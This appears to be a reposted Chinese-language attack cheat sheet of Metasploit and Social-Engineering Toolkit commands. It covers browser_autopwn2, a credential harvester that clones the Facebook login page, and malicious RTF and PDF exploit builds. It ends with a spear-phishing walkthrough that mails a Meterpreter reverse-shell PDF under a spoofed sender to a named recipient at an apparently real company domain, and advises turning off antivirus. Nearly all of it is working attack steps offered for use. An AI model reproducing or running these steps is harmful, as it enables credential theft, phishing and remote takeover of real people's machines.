浏览器攻击 

browser_autpwn2 （BAP2）

　mkdir /test　　为接受响应的服务器创建目录   use auxiliary/server/browser_autopwn2  set SRVHOST 192.168.56.1  set URIPATH /test　　　#假设我们的攻击目标是 PC，并不打算依赖于 Adobe Flash 的授权。我们会排除 Android 和 Flash 的利用。　  　set EXCLUDE_PATTERN android|adobe_flash    　　 　show advanced    查看高级选项的完整列表　　 　set ShowExploitList true　　 　set VERBOSE true　exploit　使目标浏览器访问http://192.168.56.1/test

 

窃取浏览器登录凭证root@bt:# service apache2 startroot@bt:# setoolkit

Social-Engineering Attacks --> Website Attack Vectors --> Credential Harvester Attack Method --> Site ClonerIP address for the POST back in Harvester/Tabnabbing: 填写本机IPset:webattack> Enter the url to clone:http://www.facebook.com(要克隆伪造的页面)此时会在/var/www/中生成3个文件,保存在html文件夹中,此时访问本机ip时，则会出现相同登录页面,若目标登录，会把密码储存在生成的harvester文件中

 

 Office

ms10_087漏洞，执行自定义的exe文件

msf > db_status postgresql selected, no connection msf > db_connect -y /opt/metasploit/apps/pro/ui/config/database.yml msf > search office msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof msf exploit(ms10_087_rtf_pfragments_bof) > set payload windows/exec msf exploit(ms10_087_rtf_pfragments_bof) > set cmd calc.exe msf exploit(ms10_087_rtf_pfragments_bof) > exploit [+] msf.rtf stored at /root/.msf4/local/msf.rtf

root@kali:~# cd /root/.msf4/local 生成的msf.rtf/*************************************************************************/

 

PDF

use exploit/windows/fileformat/adobe_utilprintf　　(Adobe Reader版本应低于8.1.2) set FILENAME malicious.pdf set PAYLOAD windows/exec set CMD calc.exe show options exploit

从PDF中分析和提取payload可以使用 PDF Stream Dumper 工具

恶意PDF分析可以参考：

https://zeltser.com/analyzing-malicious-documents/

https://zeltser.com/peepdf-malicious-pdf-analysis/

 

MailAttack

set> 1 　　Social-Engineering Attacks set> 1 　　Spear-Phishing Attack Vectors set:phishing>1 　　 Perform a Mass Email Attack set:payloads>6 　　 Adobe CoolType SING Table "uniqueName" Overflow set:payloads>2 　　 Windows Meterpreter Reverse_TCP set:payloads> Port to connect back on [443]: All payloads get sent to the /pentest/exploits/set/src/program_junk/template.pdf directory Do you want to rename the file? example Enter the new filename: moo.pdf 1. Keep the filename, I don't care. 2. Rename the file, I want to be cool. = ruby /opt/framework/msf3//msfcli exploit/windows/fileformat/adobe_cooltype_sing PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=443 OUTPUTPATH=/root/.msf4/local/template.pdf FILENAME=/pentest/exploits/set/src/program_junk/template.pdf ENCODING=shikata_ga_nai E

然后需要特殊处理。这个漏洞针对的Adobe 阅读器的版本是9.3.4之前。

把template.pdf拷贝到一个安装有Adobe Acrobat Pro 9.5.0的机器上（关闭防病毒软件），打开template.pdf，修改后拷贝回原目录下，覆盖原有的template.pdf

set:phishing>2 set:phishing> New filename:Dvssc_ABC_Project_Statue.pdf set:phishing>1 E-Mail Attack Single Email Address set:phishing>2 One-Time Use Email Template set:phishing> Subject of the email:ABC Project Status set:phishing> Send the message as html or plain? 'h' or 'p' [p]:p set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished: Next line of the body: Hi Wang: Next line of the body: Please review the ABC project status report. We are behind the schedule. I need your advice. Next line of the body: Next line of the body: Best Regard! Next line of the body: li Ming Next line of the body: ^Cset:phishing> Send email to:wangdongpeng@dvssc.com set:phishing>2 Use your own server or open relay set:phishing> From address (ex: moo@example.com):liming@dvssc.com set:phishing> Username for open-relay [blank]:yourname Password for open-relay [blank]: set:phishing> SMTP email server address (ex. smtp.youremailserveryouown.com):mail.163.com set:phishing> Port number for the SMTP server [25]: set:phishing> Flag this message/s as high priority? [yes|no]:yes [*] SET has finished delivering the emails set:phishing> Setup a listener [yes|no]:yes

 

转载于:https://www.cnblogs.com/ssooking/p/6066767.html

相关资源：JAVA上百实例源码以及开源项目